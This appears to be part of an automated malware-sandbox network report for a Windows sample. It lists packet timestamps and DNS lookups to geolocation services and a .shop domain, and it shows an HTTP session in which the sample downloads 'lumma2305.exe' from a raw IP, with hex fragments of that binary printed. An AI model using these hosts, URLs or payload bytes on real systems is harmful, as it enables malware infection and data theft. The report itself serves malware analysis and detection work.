                                May 24, 2024 00:22:23.328672886 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.719505072 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.719546080 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.719597101 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.719618082 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.719643116 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.719681978 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.720007896 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.720717907 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.720777988 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.720783949 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.720793962 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.721373081 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.721376896 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.721385002 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.721427917 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.722068071 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.722923040 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.722978115 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.722985983 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.723001957 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.723057032 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.723057985 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.723094940 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.723242998 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.723242998 CEST49748443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.723264933 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.723272085 CEST44349748188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.758686066 CEST44349747188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.758701086 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.758732080 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.758769989 CEST44349747188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.758882999 CEST49747443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.758887053 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.759020090 CEST49747443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.759048939 CEST44349747188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.759277105 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.759291887 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.771975040 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.772042036 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:23.772207022 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.772643089 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:23.772661924 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.260452986 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.260704041 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.261262894 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.261509895 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.262420893 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.262428999 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.262515068 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.262520075 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.262775898 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.262813091 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.264098883 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.264098883 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.264193058 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.264198065 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:24.264229059 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:24.264262915 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.384758949 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.384850025 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.385034084 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:25.385199070 CEST49751443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:25.385235071 CEST44349751188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.402767897 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.403033018 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.403182030 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:25.403431892 CEST49750443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:25.403454065 CEST44349750188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.431550980 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:25.431638956 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.431749105 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:25.432173014 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:25.432209015 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.957751036 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:25.957871914 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:26.978564024 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:26.978593111 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:26.978880882 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:26.981635094 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:26.981770992 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:26.981802940 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:26.981869936 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:26.981882095 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.200074911 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.200118065 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.200177908 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.200612068 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.200623989 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.430926085 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.431186914 CEST44349752188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.431302071 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.431302071 CEST49752443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.489437103 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.489532948 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.489619970 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.489896059 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.489929914 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.692249060 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.692331076 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.693420887 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.693439960 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.693661928 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.694763899 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.695509911 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.695555925 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.695671082 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.695719957 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.695864916 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.695930958 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.696101904 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.696162939 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.696393967 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.696448088 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.696661949 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.696712971 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.696738958 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.696769953 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.696866035 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.696914911 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.696964979 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.697052956 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.697102070 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.734592915 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.735032082 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.735122919 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.735191107 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.735258102 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:27.735337019 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:27.744766951 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.011570930 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.011765003 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.012981892 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.012994051 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.013488054 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.014607906 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.014791012 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.014837980 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.014910936 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.014928102 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.850899935 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.851142883 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.851248980 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.851310015 CEST49754443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.851325989 CEST44349754188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.905864954 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.905914068 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:28.905982971 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.906409025 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:28.906425953 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:29.475692034 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:29.475886106 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:29.477010012 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:29.477037907 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:29.478077888 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:29.479279041 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:29.479387045 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:29.479454041 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:30.438441038 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:30.438693047 CEST44349755188.114.96.3192.168.2.6
                                May 24, 2024 00:22:30.438781023 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:30.439259052 CEST49755443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:30.450426102 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:30.450462103 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:30.450536966 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:30.450870037 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:30.450882912 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:30.908796072 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:30.908900976 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:30.909028053 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:30.909147978 CEST49753443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:30.909192085 CEST44349753188.114.96.3192.168.2.6
                                May 24, 2024 00:22:31.105149031 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:31.105317116 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:31.106690884 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:31.106698990 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:31.107469082 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:31.108736038 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:31.108829021 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:31.108833075 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:31.846580982 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:31.846801043 CEST44349756188.114.96.3192.168.2.6
                                May 24, 2024 00:22:31.846801043 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:31.846860886 CEST49756443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.208081007 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.208116055 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.208353996 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.208688974 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.208698034 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.723961115 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.724052906 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.725409031 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.725418091 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.726176977 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.727421045 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.728132963 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.728173018 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.728509903 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.728543997 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.728693962 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.728841066 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.728962898 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.728987932 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.729119062 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.729149103 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.729295969 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.729321957 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.729351044 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.729495049 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.729527950 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.729559898 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.729736090 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.729774952 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.729793072 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.764369011 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.764523029 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.764564991 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.764573097 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.764621019 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.764816046 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:32.764844894 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.764880896 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:32.784543037 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:35.140809059 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:35.140928030 CEST44349757188.114.96.3192.168.2.6
                                May 24, 2024 00:22:35.141069889 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:35.141304970 CEST49757443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:35.141323090 CEST44349757188.114.96.3192.168.2.6
                                TimestampSource PortDest PortSource IPDest IP
                                May 24, 2024 00:21:55.480066061 CEST5460553192.168.2.61.1.1.1
                                May 24, 2024 00:21:55.486927986 CEST53546051.1.1.1192.168.2.6
                                May 24, 2024 00:21:56.209896088 CEST4951253192.168.2.61.1.1.1
                                May 24, 2024 00:21:56.319633961 CEST53495121.1.1.1192.168.2.6
                                May 24, 2024 00:22:03.499118090 CEST6523753192.168.2.61.1.1.1
                                May 24, 2024 00:22:03.513581991 CEST53652371.1.1.1192.168.2.6
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 24, 2024 00:21:55.480066061 CEST192.168.2.61.1.1.10x95cStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                May 24, 2024 00:21:56.209896088 CEST192.168.2.61.1.1.10xd06Standard query (0)db-ip.comA (IP address)IN (0x0001)false
                                May 24, 2024 00:22:03.499118090 CEST192.168.2.61.1.1.10x7c62Standard query (0)employhabragaomlsp.shopA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 24, 2024 00:21:55.486927986 CEST1.1.1.1192.168.2.60x95cNo error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                May 24, 2024 00:21:56.319633961 CEST1.1.1.1192.168.2.60xd06No error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false
                                May 24, 2024 00:21:56.319633961 CEST1.1.1.1192.168.2.60xd06No error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                                May 24, 2024 00:21:56.319633961 CEST1.1.1.1192.168.2.60xd06No error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                                May 24, 2024 00:22:03.513581991 CEST1.1.1.1192.168.2.60x7c62No error (0)employhabragaomlsp.shop188.114.96.3A (IP address)IN (0x0001)false
                                May 24, 2024 00:22:03.513581991 CEST1.1.1.1192.168.2.60x7c62No error (0)employhabragaomlsp.shop188.114.97.3A (IP address)IN (0x0001)false
                                • https:
                                  • ipinfo.io
                                • db-ip.com
                                • employhabragaomlsp.shop
                                • 5.42.65.116
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.6497145.42.65.116803108C:\Users\user\Desktop\tMO4FVIc9l.exe
                                TimestampBytes transferredDirectionData
                                May 24, 2024 00:22:01.363991976 CEST219OUTHEAD /lumma2305.exe HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                Host: 5.42.65.116
                                Cache-Control: no-cache
                                May 24, 2024 00:22:02.021457911 CEST155INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Length: 468480
                                Date: Thu, 23 May 2024 22:22:01 GMT
                                Server: Python/3.12 aiohttp/3.9.5
                                May 24, 2024 00:22:02.023130894 CEST218OUTGET /lumma2305.exe HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                Host: 5.42.65.116
                                Cache-Control: no-cache
                                May 24, 2024 00:22:02.268306971 CEST155INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Length: 468480
                                Date: Thu, 23 May 2024 22:22:02 GMT
                                Server: Python/3.12 aiohttp/3.9.5
                                May 24, 2024 00:22:02.268743038 CEST1236INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$I/|||}|}|}|}||V|l}|l}|l}@|o}|o}|Rich|PE
                                May 24, 2024 00:22:02.269654036 CEST1236INData Raw: af 41 00 e8 d1 36 00 00 8b 5d 08 33 ff 8b c7 89 45 e8 ff 75 0c e8 42 7e 00 00 59 8b c8 89 4d e4 8b 03 8b 40 04 8b 74 18 20 8b 44 18 24 3b c7 7c 16 7f 0e 3b f7 76 10 3b c7 7c 0c 7f 04 3b f1 76 06 2b f1 1b c7 eb 0e 0f 57 c0 66 0f 13 45 dc 8b 45 e0
                                Data Ascii: A6]3EuB~YM@t D$;|;v;|;v+WfEEuESM(}uj^}AD%@t<E;|3;v-HD@PL8tsuEEEAL8WuuP$;EuE;uAE;|3;v-H
                                May 24, 2024 00:22:02.270967960 CEST1236INData Raw: 03 00 00 8b 44 24 10 5f 5e 89 03 8b c3 5d 5b 59 c2 10 00 e8 50 06 00 00 cc 56 8b 74 24 0c 57 8b 7c 24 14 57 56 ff 74 24 14 e8 e1 fd ff ff 2b 74 24 18 83 c4 0c c1 fe 02 8d 04 b7 5f 5e c3 56 57 ff 74 24 0c 8b f1 33 c0 8b fe ab ab ab ab 83 66 10 00
                                Data Ascii: D$_^][YPVt$W|$WVt$+t$_^VWt$3ff_^VW3D$ffxvpQ_^VWt$3ffxYPt$v_^VWt$3t$ffN_^T$
                                May 24, 2024 00:22:02.270982981 CEST1236INData Raw: ee 2b ce 3b d1 77 0c 8d 04 16 3b 44 24 08 0f 42 44 24 08 5e c2 04 00 56 8b f1 83 3e 00 74 12 8b 46 08 2b 06 83 e0 fc 50 ff 36 e8 2e f9 ff ff 59 59 8b 4c 24 08 8b 44 24 0c 89 0e 8d 04 81 89 46 04 8b 44 24 10 8d 04 81 89 46 08 5e c2 0c 00 55 8b ec
                                Data Ascii: +;w;D$BD$^V>tF+P6.YYL$D$FD$F^U/G3E}$VutW<AW?tYPWMH_MUuRP}EuGEMP!MEPMM3^+jAT,eH|1u*D1
                                May 24, 2024 00:22:02.273716927 CEST896INData Raw: 08 8b f1 89 75 fc e8 5b f8 ff ff c7 06 28 d2 41 00 8b c6 5e c9 c2 04 00 55 8b ec 56 8b f1 8d 46 04 c7 06 c8 d1 41 00 50 e8 a6 38 00 00 f6 45 08 01 59 74 0a 6a 0c 56 e8 79 27 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 0c 8d 4d f4 ff 75 08 e8
                                Data Ascii: u[(A^UVFAP8EYtjVy'YY^]UMuihOBEP8UMuhOBEPn8<UMA9t=xAuA]@]Uu>vYu2]E]UuEPxYY]UUS
                                May 24, 2024 00:22:02.273730040 CEST1236INData Raw: 14 89 5e 18 89 5e 1c 89 5e 20 89 5e 24 89 5e 28 89 5e 2c 89 5e 30 e8 ea 23 00 00 8b f8 59 85 ff 74 10 6a 01 89 5d fc e8 d3 18 00 00 59 89 47 04 eb 02 8b fb 8b ce 89 7e 34 e8 c5 08 00 00 8b c6 e8 0c 24 00 00 c3 cc cc cc cc cc 55 8b ec 83 ec 14 8b
                                Data Ascii: ^^^ ^$^(^,^0#Ytj]YG~4$UESVW]CEPA{Y_^[V5?G=G?GWt@T0<?G?Gt@T<_^jA#u3SB]^^^^3^fF
                                May 24, 2024 00:22:02.276160002 CEST1236INData Raw: 08 01 74 0a 6a 50 56 e8 55 1f 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 e8 7b fd ff ff f6 45 08 01 74 0a 6a 38 56 e8 33 1f 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 d0 de 41 00 74 0a 6a 08 56 e8 10 1f 00 00 59
                                Data Ascii: tjPVUYY^]UV{Etj8V3YY^]UEVAtjVYY^]UVAhEAtjVYY^]UEVAtjVYY^]UjhAdPV/G3PEdeV$AfEYtj8VrYY
                                May 24, 2024 00:22:02.276173115 CEST948INData Raw: cc cc cc 55 8b ec 56 57 8b 7d 08 8b f1 8b cf e8 25 01 00 00 84 c0 74 06 83 66 38 00 eb 0a 8b ce 89 7e 38 e8 33 ff ff ff 5f 5e 5d c2 04 00 83 79 4c 00 74 09 ff 71 4c e8 72 64 00 00 59 c3 c2 00 00 55 8b ec 8b 45 0c 39 45 08 74 18 8b 51 14 83 fa 0f
                                Data Ascii: UVW}%tf8~83_^]yLtqLrdYUE9EtQvPuRQ]AQvPRPQWyA<9uQPVqT+AA,0^_UQSVWG_<;tG,OPOGTGGG,_^[UMhQ
                                May 24, 2024 00:22:02.276181936 CEST1236INData Raw: 8b 70 1c 8d 45 d0 50 8d 45 fc 8b ce 50 8d 45 dc 50 8d 45 cc 50 8d 45 d9 50 8d 45 d8 50 8d 47 40 50 ff 15 40 d1 41 00 8b 4d d4 ff d6 83 e8 00 74 21 83 e8 01 74 1c 48 83 e8 01 75 43 ff 77 4c ff 75 d8 e8 ac ef ff ff 59 59 84 c0 75 2e 83 cb ff eb 29
                                Data Ascii: pEPEPEPEPEPEPG@P@AMt!tHuCwLuYYu.)uE+twLVjPq;uEG=9Et^M_3[XUS]VFt)F9s"tA;uF,FC#@~Lt7t2~8uvLQtY
                                May 24, 2024 00:22:02.278719902 CEST1236INData Raw: ec 0f 76 03 8b 4d d8 8b 75 e8 8b 45 d0 2b f0 03 f1 85 f6 7e 19 ff 73 4c 4e 0f be 04 06 50 e8 84 70 00 00 59 59 85 f6 7e 05 8b 45 d0 eb e7 0f b6 7d d7 8d 4d d8 e8 b0 e6 ff ff 8b c7 e8 f4 11 00 00 c3 56 57 8b f9 8b 07 8b 70 18 8b ce ff 15 40 d1 41
                                Data Ascii: vMuE+~sLNPpYY~E}MVWp@A;tG,OB_^WGtG,;s_SVp@A;tSp@A^[_jAoq0M}eEPYu


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.64971134.117.186.1924433108C:\Users\user\Desktop\tMO4FVIc9l.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:21:56 UTC237OUTGET /widget/demo/8.46.123.175 HTTP/1.1
                                Connection: Keep-Alive
                                Referer: https://ipinfo.io/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                Host: ipinfo.io
                                2024-05-23 22:21:56 UTC514INHTTP/1.1 200 OK
                                server: nginx/1.24.0
                                date: Thu, 23 May 2024 22:21:56 GMT
                                content-type: application/json; charset=utf-8
                                Content-Length: 1028
                                access-control-allow-origin: *
                                x-frame-options: SAMEORIGIN
                                x-xss-protection: 1; mode=block
                                x-content-type-options: nosniff
                                referrer-policy: strict-origin-when-cross-origin
                                x-envoy-upstream-service-time: 3
                                via: 1.1 google
                                strict-transport-security: max-age=2592000; includeSubDomains
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
